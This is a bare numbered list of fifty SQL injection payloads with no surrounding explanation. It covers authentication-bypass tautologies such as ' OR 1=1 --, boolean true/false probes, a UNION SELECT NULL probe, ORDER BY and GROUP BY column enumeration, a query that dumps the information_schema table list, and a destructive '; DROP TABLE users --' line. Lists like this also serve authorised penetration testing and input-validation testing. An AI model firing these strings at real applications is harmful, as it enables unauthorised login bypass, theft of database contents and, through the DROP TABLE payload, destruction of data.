
1. ' OR 1=1 -- '
2. " OR 1=1 -- "
3. ') OR 1=1 -- '
4. ") OR 1=1 -- "
5. '; OR 1=1 -- '
6. ' OR 'x'='x'
7. " OR 'x'='x"
8. ') OR 'x'='x'
9. ") OR 'x'='x"
10. '; OR 'x'='x'
11. ' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--'
12. '; DROP TABLE users --'
13. '; SELECT * FROM information_schema.tables --'
14. ' OR 1=0 LIMIT 1 -- '
15. ' OR 1=1 LIMIT 1 -- '
16. " OR 1=0 LIMIT 1 -- "
17. " OR 1=1 LIMIT 1 -- "
18. ') OR 1=0 LIMIT 1 -- '
19. ") OR 1=1 LIMIT 1 -- "
20. '; OR 1=0 LIMIT 1 -- '
21. '; OR 1=1 LIMIT 1 -- '
22. "' OR 1=0 LIMIT 1 -- "
23. "' OR 1=1 LIMIT 1 -- "
24. ' AND 1=1'
25. ' AND 1=0'
26. ' OR 2>1 -- '
27. " OR 2>1 -- "
28. ') OR 2>1 -- '
29. ") OR 2>1 -- "
30. '; OR 2>1 -- '
31. ' OR 2>2 -- '
32. " OR 2>2 -- "
33. ') OR 2>2 -- '
34. ") OR 2>2 -- "
35. '; OR 2>2 -- '
36. "' OR 2>2 -- "
37. ' AND 2>1'
38. ' AND 2>2'
39. ' OR 1=1 ORDER BY 1--'
40. ' OR 1=1 ORDER BY 2--'
41. ' OR 1=1 ORDER BY 3--'
42. ' OR 1=1 ORDER BY 4--'
43. ' OR 1=1 ORDER BY 5--'
44. ' OR 1=1 ORDER BY 6--'
45. ' OR 1=1 ORDER BY 7--'
46. ' OR 1=1 ORDER BY 8--'
47. ' OR 1=1 ORDER BY 9--'
48. ' OR 1=1 GROUP BY 1--'
49. ' OR 1=1 GROUP BY 2--'
50. ' OR 1=1 GROUP BY 3--'

